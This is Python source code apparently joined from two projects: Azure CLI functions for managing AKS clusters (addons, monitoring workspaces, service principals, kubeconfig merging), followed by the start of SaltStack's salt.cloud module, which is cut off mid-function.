instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
instance.kubernetes_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension import get_extension_path
ext_dir = get_extension_path(extension_name)
sys.path.append(ext_dir)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(extension_name):
try:
from azure.cli.command_modules.extension import custom
custom.add_extension(extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.command_modules.extension import custom
custom.update_extension(extension_name=extension_name)
# reloading the imported module to update
try:
from importlib import reload
except ImportError:
pass # for python 2
reload(sys.modules[extension_module])
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureLocationToOmsRegionCodeMap = {
"eastus": "EUS",
"westeurope": "WEU",
"southeastasia": "SEA",
"australiasoutheast": "ASE",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"japaneast": "EJP",
"uksouth": "SUK",
"canadacentral": "CCA",
"centralindia": "CIN",
"eastus2euap": "EAP"
}
AzureRegionToOmsRegionMap = {
"australiaeast": "australiasoutheast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "eastus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "eastus",
"eastasia": "southeastasia",
"eastus": "eastus",
"eastus2": "eastus",
"japaneast": "japaneast",
"japanwest": "japaneast",
"northcentralus": "eastus",
"northeurope": "westeurope",
"southcentralus": "eastus",
"southeastasia": "southeastasia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westus": "eastus",
"westus2": "eastus",
"centralindia": "centralindia",
"southindia": "centralindia",
"westindia": "centralindia",
"koreacentral": "southeastasia",
"koreasouth": "southeastasia",
"francecentral": "westeurope",
"francesouth": "westeurope"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
default_region_name = "eastus"
default_region_code = "EUS"
workspace_region = AzureRegionToOmsRegionMap[
rg_location] if AzureRegionToOmsRegionMap[rg_location] else default_region_name
workspace_region_code = AzureLocationToOmsRegionCodeMap[
workspace_region] if AzureLocationToOmsRegionCodeMap[workspace_region] else default_region_code
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None,
purge_sp_cache=False):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
try:
obj_id = _resolve_service_principal(rbac_client.service_principals, service_principal)
rbac_client.service_principals.get(obj_id)
except GraphErrorException as ex:
logger.warning(ex)
if ex.response.status_code == 404:
logger.warning('Cached service principal doesn\'t exist, creating a new one')
service_principal = None
client_secret = None
else:
raise ex
except CLIError as ex:
if str(ex).index('doesn\'t exist'):
logger.warning('Cached service principal doesn\'t exist, creating a new one')
service_principal = None
client_secret = None
else:
raise ex
if not service_principal or purge_sp_cache:
# Nothing to load, make one.
if not client_secret or purge_sp_cache:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"centralus",
"eastus",
"eastus2",
"westus",
"westus2",
"northeurope",
"westeurope",
"southeastasia",
"australiaeast"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, this will kill the pool
totally calling terminate & join and ands with a SaltCloudSystemExit
exception notifying callers from the abnormal termination
- If the queue returns END or callback is defined and returns True,
it just join the process and return the data.
target
the function you want to execute in multiprocessing
pool
pool object can be None if you want a default pool, but you ll
have then to define pool_size instead
pool_size
pool size if you did not provide yourself a pool
callback
a boolean taking a string in argument which returns True to
signal that 'target' is finished and we need to join
the pool
queue
A custom multiprocessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more arguments combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
kwargs to give to the function in case of process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {0}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
